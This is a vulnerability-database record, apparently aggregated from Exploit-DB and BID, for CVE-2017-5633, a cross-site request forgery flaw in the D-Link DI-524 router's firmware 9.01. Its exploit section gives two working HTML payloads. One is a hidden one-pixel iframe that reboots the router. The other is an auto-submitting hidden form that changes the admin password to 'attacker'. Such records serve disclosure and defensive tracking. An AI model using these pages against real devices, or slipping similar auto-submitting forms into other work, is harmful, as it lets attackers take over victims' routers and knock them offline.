Sign-up

ID

VAR-E-201612-0014


CVE

cve_id:CVE-2017-5633

Trust: 1.3

sources: BID: 96475 // EXPLOIT-DB: 40983

EDB ID

40983


TITLE

D-Link DI-524 - Cross-Site Request Forgery - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 40983

DESCRIPTION

D-Link DI-524 - Cross-Site Request Forgery. CVE-2017-5633 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 40983

AFFECTED PRODUCTS

vendor:d linkmodel:di-524scope: - version: -

Trust: 1.6

vendor:dlinkmodel:di-524scope:eqversion:9.01

Trust: 0.3

sources: BID: 96475 // EXPLOIT-DB: 40983 // EDBNET: 97031

EXPLOIT

Title: D-Link DI-524 - Cross-Site-Request-Forgery Vulnerability
Credit: Felipe Soares de Souza
Date: 09/12/2016
Vendor: D-Link
Product: D-Link DI-524 Wireless 150
Product link: https://dlink.com.br/produto/di-524150
Version: Firmware 9.01

1- Reboot the device
<html>
<head>
<title>CSRF - Reboot the device</title>
</head>
<body>
<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
</body>
</html>

2- Change admin account

<html>
<head>
<title>CSRF - Change admin account</title>
</head>
<body>
<form method="POST" action="http://192.168.1.1/cgi-bin/pass">
<input type="hidden" name="rc" value="@atbox">
<input type="hidden" name="Pa" value="attacker">
<input type="hidden" name="p1" value="attacker">
</form>

<script type="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 40983

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 40983

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 40983

TYPE

Cross-Site Request Forgery

Trust: 1.6

sources: EXPLOIT-DB: 40983 // EDBNET: 97031

CREDITS

Felipe Soares de Souza

Trust: 0.6

sources: EXPLOIT-DB: 40983

EXTERNAL IDS

db:EXPLOIT-DBid:40983

Trust: 1.6

db:NVDid:CVE-2017-5633

Trust: 1.3

db:EDBNETid:97031

Trust: 0.6

db:BIDid:96475

Trust: 0.3

sources: BID: 96475 // EXPLOIT-DB: 40983 // EDBNET: 97031

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-5633

Trust: 1.0

url:https://www.exploit-db.com/exploits/40983/

Trust: 0.6

url:http://seclists.org/fulldisclosure/2017/feb/70

Trust: 0.3

url:http://www.dlink.co.in/

Trust: 0.3

sources: BID: 96475 // EXPLOIT-DB: 40983 // EDBNET: 97031

SOURCES

db:BIDid:96475
db:EXPLOIT-DBid:40983
db:EDBNETid:97031

LAST UPDATE DATE

2022-07-27T10:00:44.142000+00:00


SOURCES UPDATE DATE

db:BIDid:96475date:2017-03-07T01:08:00

SOURCES RELEASE DATE

db:BIDid:96475date:2017-02-27T00:00:00
db:EXPLOIT-DBid:40983date:2016-12-09T00:00:00
db:EDBNETid:97031date:2018-03-11T00:00:00